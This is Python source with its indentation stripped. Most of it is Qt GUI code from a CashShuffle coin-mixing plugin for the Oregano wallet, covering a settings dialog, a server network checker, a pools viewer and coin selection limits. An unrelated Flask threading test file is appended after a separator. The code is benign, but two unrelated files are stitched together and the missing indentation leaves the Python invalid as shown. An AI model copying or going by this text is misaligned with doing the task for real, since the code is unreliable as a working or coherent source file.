if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limied. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one o the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # slot won't get called from setting radio buttons programmaticallys, so we force-call the slot
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstrat Base class -- do not instantiate this as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab which interit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
grid.addWidget(self.cb, 0, 1)
grid.addWidget(QLabel(_("Host"), self), 1, 0)
hbox = QHBoxLayout(); grid.addLayout(hbox, 1, 1, 1, 2); grid.setColumnStretch(2, 1)
self.le = QLineEdit(self); hbox.addWidget(self.le)
self.le.textEdited.connect(lambda x='ignored': self.formChanged.emit())
hbox.addWidget(QLabel(_("P:"), self))
self.sb = QSpinBox(self); self.sb.setRange(1, 65535); hbox.addWidget(self.sb)
self.sb.valueChanged.connect(lambda x='ignored': self.formChanged.emit())
self.chk = QCheckBox(_("SSL"), self); hbox.addWidget(self.chk)
self.chk.toggled.connect(lambda x='ignored': self.formChanged.emit())
self.cb.currentIndexChanged.connect(lambda x='ignored': self.from_combobox())
self.from_combobox()
hbox2 = QHBoxLayout()
vbox.addLayout(hbox2)
self.statusGB = QGroupBox(_("Status"), self)
hbox2.addWidget(self.statusGB)
vbox2 = QVBoxLayout(self.statusGB)
self.statusLabel = QLabel("", self.statusGB)
self.statusLabel.setMinimumHeight(50)
self.statusLabel.setAlignment(Qt.AlignAbsolute|Qt.AlignTop)
vbox2.addWidget(self.statusLabel)
# add the "Coin selection settings..." link
self.coinSelectionSettingsLabel = QLabel("<a href='dummy'>{}</a>".format(_("Coin selection settings...")))
self.coinSelectionSettingsLabel.linkActivated.connect(self.onCoinSelectionSettingsClick)
vbox.addWidget(self.coinSelectionSettingsLabel)
self.vbox = vbox
if not isinstance(self, SettingsTab):
# add close button only if not SettingsTab
vbox.addStretch()
buttons = Buttons(CloseButton(self), OkButton(self))
vbox.addLayout(buttons)
# NEW! add the "View pools..." button to the bottom
vbox = self.statusGB.layout()
hbox = QHBoxLayout()
hbox.addStretch(1)
self.poolsBut = QPushButton(_("View pools..."))
f = self.poolsBut.font(); f.setPointSize(f.pointSize()-(2 if sys.platform=='darwin' else 1)); self.poolsBut.setFont(f)
hbox.addWidget(self.poolsBut)
hbox.addStretch(1)
vbox.addLayout(hbox)
self.statusChanged.connect(self._vpGotStatus)
self.poolsBut.setEnabled(False)
self.poolsBut.clicked.connect(self._vpOnPoolsBut, Qt.DirectConnection)
def kill(self):
self.stopNetworkChecker()
def onCoinSelectionSettingsClick(self, ignored):
win = CoinSelectionSettingsWindow()
win.exec_()
win.deleteLater()
if self.window().isVisible():
self.window().raise_()
self.activateWindow()
def _vpGotStatus(self, sdict):
self._vpLastStatus = sdict.copy()
if sdict.get('status') in (_("Ok"), _("Banned")):
self.poolsBut.setEnabled(True)
else:
self.poolsBut.setEnabled(False)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=True)
def _on_statusChanged(self, d):
red, blue, green = "red", "blue", "green"
try: red, blue, green = ColorScheme.RED._get_color(0), ColorScheme.BLUE._get_color(0), ColorScheme.GREEN._get_color(0)
except AttributeError: pass
#self.print_error("status changed", d)
if not d: # Empty dict means we are connecting
self.serverOk = None
self.statusLabel.setText("<font color=\"{}\"><i>{}</i></font>".format(blue, _("Checking server...")))
return
if d.get('failed'): # Dict with only 1 key, 'failed' means connecton failed
reason = d['failed']
if reason == 'offline_mode':
reason = _("Oregano is in offline mode.")
elif reason == 'bad':
reason = _("Server is misconfigured")
elif reason == 'ssl':
reason = _("Failed to verify SSL certificate")
else:
reason = _("Connection failure")
self.statusLabel.setText("<b>" + _("Status") + ":</b> <font color=\"{}\">{}</font>".format(red, reason))
self.serverOk = False
return
# any other case has all the below keys defined
self.serverOk = d['status'] == _('Ok')
self.statusLabel.setText(
'''
<b>{}:</b> <i>{}</i><br>
<b>{}:</b> <font color="{}">{}</font> {} {}
<small>{}: {} {}: {} {}: {}</small>
'''
.format(_('Server'), _elide(d['host'], maxlen=40, startlen=12),
_('Status'), green if not d['banned'] else "#dd4444", d['status'], " <b>{}</b> {}".format(_("Ban score:"),d['banScore']) if d['banScore'] else '', '<br>' if d['banScore'] else '',
_('Pool size'), d['poolSize'],
_('Connections'),
d['connections'],
_('Active pools'), d['pools'])
)
def _on_formChange(self):
try:
#self.print_error("onFormChange")
d = self.get_form()
self.settingsChanged.emit(d)
except RuntimeError as e:
# Paranoia guard against C++ object deleted exception
# (we may get called from a QTimer.singleShot below)
if 'C++' not in str(e).upper():
raise
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = NetworkChecker(self)
self.statusChanged.connect(self._on_statusChanged, Qt.QueuedConnection)
self.formChanged.connect(self._on_formChange, Qt.QueuedConnection)
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(100, self._on_formChange) # kicks off the network checker by sending it new settings
def stopNetworkChecker(self):
if self.networkChecker:
try: self.statusChanged.disconnect(self._on_statusChanged)
except TypeError: pass # not connected
try: self.statusChanged.disconnect(self._on_formChange)
except TypeError: pass # not connected
self.networkChecker.stop()
self.networkChecker = None
self.print_error("Stopped network checker.")
# /
# /SettingsDialogMixin
class SettingsDialog(SettingsDialogMixin, AppModalDialog):
''' Concrete class for the stand-alone Settings window you get when
you right-click and get "CashShuffle Settings..." from the CashShuffle status
button context menu '''
def __init__(self, title, config, message=None, windowFlags=None):
AppModalDialog.__init__(self, title=title, windowFlags=windowFlags, parent=None)
self.setMinimumSize(400, 350)
SettingsDialogMixin.__init__(self, config=config, message=message)
# /SettingsDialog
class SettingsTab(SettingsDialogMixin, QWidget):
# Apparently if you inherit from a C++ object first it creates problems.
# You are supposed to inherit from the mixins in Python first, then the
# Qt C++ object last. Who knew. All of Oregano codebase apparently
# is doing it wrong.
# See this: http://python.6.x6.nabble.com/Issue-with-multiple-inheritance-td5207771.html
# So we inherit from our mixin first. (Note I had problems with overriding
# __init__ here and Qt's C++ calling the wrong init here.)
applyChanges = pyqtSignal(object)
def __init__(self, parent, config, message=None):
QWidget.__init__(self, parent=parent)
SettingsDialogMixin.__init__(self, config=config, message=message)
# add the "Apply" button to the bottom
self.apply = QPushButton(_("Apply"), self)
hbox = QHBoxLayout()
self.vbox.addLayout(hbox)
self.vbox.addStretch()
hbox.addStretch(1)
hbox.addWidget(self.apply)
self.apply.clicked.connect(self._re_emit_applyChanges)
def _re_emit_applyChanges(self):
self.applyChanges.emit(self)
def _vpOnPoolsBut(self):
w = PoolsWinMgr.show(self._vpLastStatus, self.get_form(), self.config, modal=False, parent_window=self)
# /SettingsTab
class NetworkChecker(PrintError):
''' Runs in a separate thread, checks the server automatically when the settings form changes
and publishes results to GUI thread. '''
pollTimeSecs = 15.0
checkShufflePort = True
verifySSL = True # if true, verify the ssl socket of the shuffle port when checking the server
def __init__(self, parent):
assert isinstance(parent, NetworkCheckerDelegateMixin), "Parent to NetworkChecker must be a NetworkCheckerDelegateMixin"
self.weakParent = Weak.ref(parent)
self.q = queue.Queue()
self.thread = threading.Thread(target=self.thread_func, daemon=True)
self._please_stop = False
self._sock = None
self._update_ct = 0
parent.settingsChanged.connect(self._on_settings_changed, Qt.QueuedConnection)
self.print_error("created")
finalization_print_error(self)
def stop(self):
if self.thread.is_alive():
self._please_stop = True
self.q.put(None) # signal to thread to die
try: self._sock.close() # force close thread
except: pass
self.thread.join(timeout=15.0) # wait for thread to finish
if self.thread.is_alive():
# This should never happen
self.print_error("*** WARNING: Waited for thread to exit for 15.0 seconds, but it is still running! FIXME!")
def start(self):
if not self.thread.is_alive():
self.q.put(None) # paranoia just in case
self.q = queue.Queue() # clear the queue
self._please_stop = False
self.thread.start() # this raises RuntimeError if called more than once.
def _on_settings_changed(self, d):
self._update_ct = 0 # reset ctr for these settings. ctr = 0 causes us to tell gui to draw the "Connecting, please wait..." text
self.q.put(d.copy()) # notify thread which waits on this q
def _wait_drain_q(self, last_settings):
q = self.q
try:
res = None
try:
# Drain queue to get latest settings
while True:
# keep reading from the queue until it's empty
res = q.get_nowait()
if res is None:
# we got a None, return early -- this indicates abort thread
return res
except queue.Empty:
''' No settings were waiting in queue.. move to blocking
operation '''
if self._please_stop:
return # indicate stop
if res is not None:
# we had a result, return
return res
# no result from Queue, block for pollTimeSecs
return q.get(timeout=self.pollTimeSecs)
except queue.Empty:
# no result in pollTimeSecs, return last settings value
return last_settings
def thread_func(self):
try:
self.print_error("thread entered")
settings = dict()
while True:
settings = self._wait_drain_q(settings)
if settings is None:
return # exit thread if we got a None
if settings:
self._on_update_status(settings)
finally:
self.print_error("thread exiting")
def _emit_status_changed(self, d):
self.weakParent() and self.weakParent().statusChanged.emit(d)
def _on_update_status(self, d):
d = d.copy()
#self.print_error("updateStatus", d) # XXX
is_bad_server, is_bad_ssl, is_offline_mode = False, False, False
try:
if not Network.get_instance():
is_offline_mode = True
raise RuntimeError("No network")
if self._update_ct == 0:
self._emit_status_changed(dict()) # tells GUI we are "connecting..."
self._update_ct += 1
port, poolSize, connections, pools, banScore, banned = query_server_for_stats(d['server'], d['info'], d['ssl'])
if self._please_stop:
return
if poolSize < 3:
# hard-coded -- do not accept servers with poolSize < 3
is_bad_server = True
raise RuntimeError("PoolSize must be >=3, got: {}".format(poolSize))
if d['ssl'] and self.verifySSL and not verify_ssl_socket(d['server'], int(port), timeout=7.5):
is_bad_ssl = True
raise RuntimeError("Could not verify SSL server certificate.")
if self._please_stop:
return
if self.checkShufflePort:
self._sock = socket.create_connection((d['server'], port), 5.0) # test connectivity to port
self._sock.close()
self._sock = None
if self._please_stop:
return
self._emit_status_changed({
'host' : d['server'],
'status' : _('Ok') if not banned else _('Banned'),
'poolSize' : str(poolSize),
'connections' : str(connections),
'pools' : str(len(pools)),
'poolsList' : pools,
'banScore' : banScore,
'banned' : banned,
'name' : d['server'] + ":" + str(d['info']),
'info' : d['info'],
'ssl' : d['ssl'],
})
except Exception as e:
# DEBUG
#import traceback
#traceback.print_exc()
# /DEBUG
self.print_error("exception on connect:",str(e))
if is_offline_mode:
self._emit_status_changed({'failed' : 'offline_mode'})
elif is_bad_ssl:
self._emit_status_changed({'failed' : 'ssl'})
elif is_bad_server:
self._emit_status_changed({'failed' : 'bad'})
else:
self._emit_status_changed({'failed' : 'failed'})
# / NetworkChecker
class PoolsWinMgr(QObject, PrintError):
simpleChangedSig = pyqtSignal()
_instance = None
def __init__(self):
assert not PoolsWinMgr._instance, "More than 1 PoolsWinMgr instance detected -- PoolsWinMgr is a singleton!"
super().__init__()
PoolsWinMgr._instance = self
self.poolWindows = {}
self.print_error("created")
#DEBUG
destroyed_print_error(self)
def __del__(self):
stale = True
if PoolsWinMgr._instance is self:
PoolsWinMgr._instance = None
stale = False
print_error("[{}] finalized{}".format(__class__.__name__, " (stale instance)" if stale else ''))
if hasattr(super(), '__del__'):
super().__del__()
#public methods
@classmethod
def instance(cls, create_if_missing=True):
if not cls._instance and create_if_missing:
cls._instance = cls()
return cls._instance
@classmethod
def killInstance(cls):
if cls._instance:
cls._instance._killAll()
cls._instance.deleteLater()
cls._instance = None
@classmethod
def closeAll(cls):
''' This implicitly will also delete all the windows when event loop next runs. '''
app = QApplication.instance()
if app:
poolWins = [w for w in app.topLevelWidgets() if isinstance(w, PoolsWindow)]
for w in poolWins:
w.close()
@classmethod
def show(cls, stats_dict, network_settings, config, *, parent_window=None, modal=False):
mgr = cls.instance()
return mgr._createOrShow(stats_dict, network_settings, config, parent_window=parent_window, modal=modal)
#private methods
def _createOrShow(self, stats_dict, network_settings, config, *, parent_window=None, modal=False):
d = stats_dict
if not isinstance(d, dict) or not d or not network_settings:
self.print_error("createOrShow: got invalid args.. will not create/show a window")
return
name = d['name']
w = self.poolWindows.get(name)
if w and ((modal and w.windowModality() != Qt.ApplicationModal)
or (not modal and w.windowModality() != Qt.NonModal)):
self.print_error("Found extant window {} but modal spec != extant modal, killing...".format(name))
self._kill(name)
w = None
if not w:
self.print_error("Creating", name)
w = PoolsWindow(config, parent_window, d, network_settings, modal=modal)
self.poolWindows[name] = w
w.closed.connect(self._kill) # clean-up instance
else:
self.print_error("Updating", name)
w.weakParent = Weak.ref(parent_window) if parent_window else None
w.settings = network_settings
w.settingsChanged.emit(w.settings)
if w.isMinimized():
w.showNormal()
w.show(); w.raise_(); w.activateWindow()
return w
def _kill(self, name):
window = self.poolWindows.pop(name) # will actually delete the QWidget instance.
window.stopNetworkChecker()
window.deleteLater() # force Qt delete. This call may be superfluous
self.print_error("Killed", name)
def _killAll(self):
for n in self.poolWindows.copy():
self._kill(n)
# /PoolsWinMgr
class PoolsWindow(QWidget, PrintError, NetworkCheckerDelegateMixin):
closed = pyqtSignal(str)
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
def __init__(self, config, pseudo_parent, serverDict, settings, modal=False):
super().__init__() # top-level window
self.setWindowModality(Qt.ApplicationModal if modal else Qt.NonModal)
self.config = config
self.weakParent = Weak.ref(pseudo_parent) if pseudo_parent else None
self.sdict = serverDict.copy()
self.settings = settings
self.networkChecker = None
self.needsColumnSizing = True
name = self.sdict['name']
self.setObjectName(name)
self.setWindowTitle("CashShuffle - {} - Pools".format(_elide(name)))
self.vbox = QVBoxLayout(self)
# pools group box
self.poolsGB = QGroupBox(_("{} Pools").format(_elide(name)) + " (0)")
self.vbox.addWidget(self.poolsGB)
self.vbox.setStretchFactor(self.poolsGB, 2)
vbox2 = QVBoxLayout(self.poolsGB)
# ban label
self.banLabel = HelpLabel('', _("Bans usually occur when other shufflers detected invalid inputs coming from your client. Bans are temporary and usually last up to 30 minutes.\n\nThey may happen occasionally in rare circumstances. However, if this keeps happening please contact the developers and file a bug report."))
self.banLabel.setHidden(True)
vbox2.addWidget(self.banLabel)
self.tree = QTreeWidget()
self.tree.setSelectionMode(QAbstractItemView.NoSelection)
self.tree.setMinimumHeight(50)
self.tree.setHeaderItem(QTreeWidgetItem([_('Tier'), _('Players'), _('Type'), _('Version'), _('Full')]))
vbox2.addWidget(self.tree)
# The "simple view" checkbox
hbox = QHBoxLayout()
self.simpleChk = QCheckBox(_("Omit incompatible pools")) # NB: checkbox state will be set in self.refresh()
hbox.addWidget(self.simpleChk)
vbox2.addLayout(hbox)
# bottom buts
self.vbox.addStretch()
hbox = QHBoxLayout()
self.closeBut = QPushButton(_("Close"))
hbox.addStretch(1)
hbox.addWidget(self.closeBut)
self.vbox.addLayout(hbox)
# signals
self.closeBut.clicked.connect(self.close)
self.closeBut.setDefault(True)
self.statusChanged.connect(self.refresh)
self.simpleChk.clicked.connect(self._setSimple)
# NB: some signal/slot connections are also made in showEvent()
# etc...
self.resize(400,300)
#DEBUG
destroyed_print_error(self)
def diagnostic_name(self):
return "{}/{}".format(super().diagnostic_name(), self.objectName())
def closeEvent(self, e):
#self.print_error("Close")
self.closed.emit(self.objectName())
parent = self.weakParent and self.weakParent()
if isinstance(parent, QWidget) and parent.isVisible() and parent.window().isVisible():
try:
# for some reason closing this dialog raises the wallet window and not the network dialog
# activate the network dialog if it's up..
parent.window().activateWindow()
except RuntimeError as e:
# Deal with wrapped C/C++ object deleted. For some reason
# the weakRef is still alive even after C/C++ deletion
# (and no other references referencing the object!).
if 'C++' in str(e):
self.print_error("Underlying C/C++ object deleted. Working around PyQt5 bugs and ignoring...")
else:
raise
super().closeEvent(e)
e.accept()
def hideEvent(self, e):
super().hideEvent(e)
if e.isAccepted():
#self.print_error("Hide")
try: PoolsWinMgr.instance().simpleChangedSig.disconnect(self._simpleChangedSlot)
except TypeError: pass # Not connected.
self.stopNetworkChecker()
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
#self.print_error("Show")
PoolsWinMgr.instance().simpleChangedSig.connect(self._simpleChangedSlot)
self.refresh(self.sdict)
self.startNetworkChecker()
# do stuff related to refreshing, etc here...
def _isSimple(self):
return bool(self.config.get(ConfKeys.Global.VIEW_POOLS_SIMPLE, True))
def _setSimple(self, b):
b = bool(b)
if b != self._isSimple():
self.config.set_key(ConfKeys.Global.VIEW_POOLS_SIMPLE, b)
self.needsColumnSizing = True
PoolsWinMgr.instance().simpleChangedSig.emit()
def _simpleChangedSlot(self):
self.refresh(self.sdict)
def refresh(self, sdict):
# NB: sdict may be non-empty (has actual results) but still contain no
# pools if server has no pools. It's only empty before we get a response
# from stats port.
if not sdict:
return
if self.sdict is not sdict:
self.sdict = sdict.copy()
simple = self._isSimple()
self.simpleChk.setChecked(simple)
mysettings = BackgroundShufflingThread.latest_shuffle_settings
# handle if we detected a ban
if self.sdict.get('banned'):
banScore = self.sdict.get('banScore') or 0
self.banLabel.setText('<font color="#dd4444"><b>{}</b></font> (ban score: {})'.format(_("Banned"), banScore))
self.banLabel.setHidden(False)
else:
self.banLabel.setHidden(True)
pools = self.sdict.get('poolsList', list()).copy()
poolSize = str(self.sdict.get('poolSize', ''))
self.tree.clear()
try:
pools.sort(reverse=True, key=lambda x:(0 if x['full'] else 1, x['amount'], x['members'], -x.get('version',0)))
except (KeyError, ValueError, TypeError):
# hmm. Pools dict is missing or has bad keys. Assume bad input. Clear list and proceed with a 'no pools' message
pools = []
for c in range(2,4):
self.tree.setColumnHidden(c, simple)
def grayify(twi):
b = twi.foreground(0)
b.setColor(Qt.gray)
for i in range(twi.columnCount()):
twi.setForeground(i, b)
for p in pools:
typ, version = p.get('type', mysettings.type_name), p.get('version', mysettings.version)
is_my_settings = typ == mysettings.type_name and version == mysettings.version
if not simple or is_my_settings:
twi = QTreeWidgetItem([
format_satoshis_plain(p['amount']) + " XRG",
"{} / {}".format(str(p['members']), poolSize),
str(p.get('type','?')).lower(),
str(p.get('version','?')),
"√" if p['full'] else '-',
])
if not is_my_settings:
grayify(twi)
self.tree.addTopLevelItem(twi)
tit = self.poolsGB.title().rsplit(' ', 1)[0]
self.poolsGB.setTitle(tit + " ({})".format(self.tree.topLevelItemCount()))
def sizeColumnsToFit():
for i in range(self.tree.columnCount()):
self.tree.resizeColumnToContents(i)
if not self.tree.topLevelItemCount():
twi = QTreeWidgetItem([_('No Pools'), '', '', '', ''])
f = twi.font(0); f.setItalic(True); twi.setFont(0, f)
self.tree.addTopLevelItem(twi)
self.tree.setFirstItemColumnSpanned(twi, True)
self.tree.setHeaderHidden(True)
sizeColumnsToFit() # in no pools mode we unconditionally size to fit
self.needsColumnSizing = True # once we enter this "No pools.." mode, we need to force resize columns next time we have real entries to avoid layout weirdness
else:
self.tree.setHeaderHidden(False)
if self.needsColumnSizing: # this flag suppresses resizing each refresh to allow users to manually size the columns after a display with real data appears.
sizeColumnsToFit()
self.needsColumnSizing = False
def _kick_off_nc(self):
try:
self.settingsChanged.emit(self.settings) # kicks off the NetworkChecker by sending it some server settings to check
except RuntimeError:
pass # paranoia: guard against wrapped C++ object exception.. shouldn't happen because timer was keyed off this object as receiver
def startNetworkChecker(self):
if self.networkChecker: return
self.networkChecker = nc = NetworkChecker(self)
nc.pollTimeSecs, nc.verifySSL, nc.checkShufflePort = 2.0, False, False
self.print_error("Starting network checker...")
self.networkChecker.start()
QTimer.singleShot(500, self._kick_off_nc) # despite appearances timer will not fire after object deletion due to PyQt5 singal/slot receiver rules
def stopNetworkChecker(self):
if self.networkChecker:
self.networkChecker.stop() # waits for network checker to finish...
self.networkChecker = None
self.print_error("Stopped network checker.")
# /PoolsWindow
class CoinSelectionSettingsWindow(AppModalDialog, PrintError):
''' The pop-up window to manage minimum/maximum coin amount settings.
Accessible from a link in the "CashShuffle Settings.." window or Network
Dialog tab. '''
def __init__(self, title=None):
super().__init__(title=title or _("CashShuffle - Coin Selection Settings"), parent=None)
vbox = QVBoxLayout(self)
lbl = QLabel(_("Specify minimum and maximum coin amounts to select for shuffling:"))
lbl.setWordWrap(True)
vbox.addWidget(lbl)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Minimum coin:"),
_("Coins (UTXOs) below this amount will not be selected for shuffling.")))
self.minEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.minEdit)
vbox.addLayout(hbox)
hbox = QHBoxLayout()
hbox.addWidget(HelpLabel(_("Maximum coin:"),
_("Coins (UTXOs) up to this amount will be selected for shuffling.")))
self.maxEdit = BTCAmountEdit(decimal_point=self._decimal_point,
parent=self)
hbox.addWidget(self.maxEdit)
vbox.addLayout(hbox)
self.maxEdit.textEdited.connect(self.clearErr)
self.minEdit.textEdited.connect(self.clearErr)
vbox.addStretch()
self.errLabel = QLabel("")
self.errLabel.setAlignment(Qt.AlignCenter)
vbox.addWidget(self.errLabel)
vbox.addStretch()
vbox.addLayout(Buttons(CancelButton(self),
EnterButton(_("Defaults"), self.default),
EnterButton(_("Apply"), self.apply),
))
self.resize(320,200)
self.fromConfig()
# DEBUG Qt destruction
destroyed_print_error(self)
def _decimal_point(self): return get_config().get('decimal_point', 8)
def _fmt_amt(self, amt): return format_satoshis_plain(amt, self._decimal_point())
def apply(self):
lower, upper = self.minEdit.get_amount(), self.maxEdit.get_amount()
if not lower or not upper or upper <= lower:
self.setErr(_("Invalid amount"))
return
hard_upper = BackgroundShufflingThread.hard_upper_bound()
if upper > hard_upper:
self.setErr(_("Upper limit is {}").format(self._fmt_amt(hard_upper)))
return
hard_lower = BackgroundShufflingThread.hard_lower_bound()
if lower < hard_lower:
self.setErr(_("Lower limit is {}").format(self._fmt_amt(hard_lower)))
return
if (lower, upper) != tuple(BackgroundShufflingThread.update_lower_and_upper_bound_from_config()):
pre = ''
if (lower, upper) == self._get_defaults():
BackgroundShufflingThread.reset_lower_and_upper_bound_to_defaults()
pre = _("Default values restored.\n\n")
else:
actual_lower, actual_upper = BackgroundShufflingThread.set_lower_and_upper_bound(lower, upper)
if (lower, upper) != (actual_lower, actual_upper):
pre = _("Actual amounts applied: {} and {}.\n\n").format(self._fmt_amt(actual_lower),
self._fmt_amt(actual_upper))
self.show_message(pre+_("Changes will take effect when the next shuffle round starts (usually within in a few minutes)."))
self.accept()
def fromConfig(self):
lower, upper = BackgroundShufflingThread.update_lower_and_upper_bound_from_config()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def _get_defaults(self): return BackgroundShufflingThread.DEFAULT_LOWER_BOUND, BackgroundShufflingThread.DEFAULT_UPPER_BOUND
def default(self):
lower, upper = self._get_defaults()
self.minEdit.setAmount(lower)
self.maxEdit.setAmount(upper)
self.clearErr()
def setErr(self, txt='', noerr=False):
txt = txt or ""
if noerr:
try: color = ColorScheme.DEFAULT._get_color(0)
except AttributeError: color = "#666666"
else:
try: color = ColorScheme.RED._get_color(0)
except AttributeError: color = "red"
self.errLabel.setText('<font color="{}">{}</font>'.format(color, txt))
def clearErr(self): self.setErr('', noerr=True)
# /CoinSelectionSettingsWindow
|
test_flask_threads.py
|
from unittest.mock import Mock
import pytest
from flask import g
from flask import jsonify
from flaskthreads import AppContextThread
from flaskthreads import ThreadPoolWithAppContextExecutor
TEST_URL = '/test'
TEST_G = 'TEST'
TEST_RESULT = {'ok': True}
def test_app_context_thread(flask_app):
"""Test accessing flask.g from another thread."""
mock_action = Mock()
@flask_app.route(TEST_URL)
def test_handler():
g.test = TEST_G
thread = AppContextThread(target=lambda: mock_action.action(g.test))
thread.start()
thread.join()
return jsonify(TEST_RESULT)
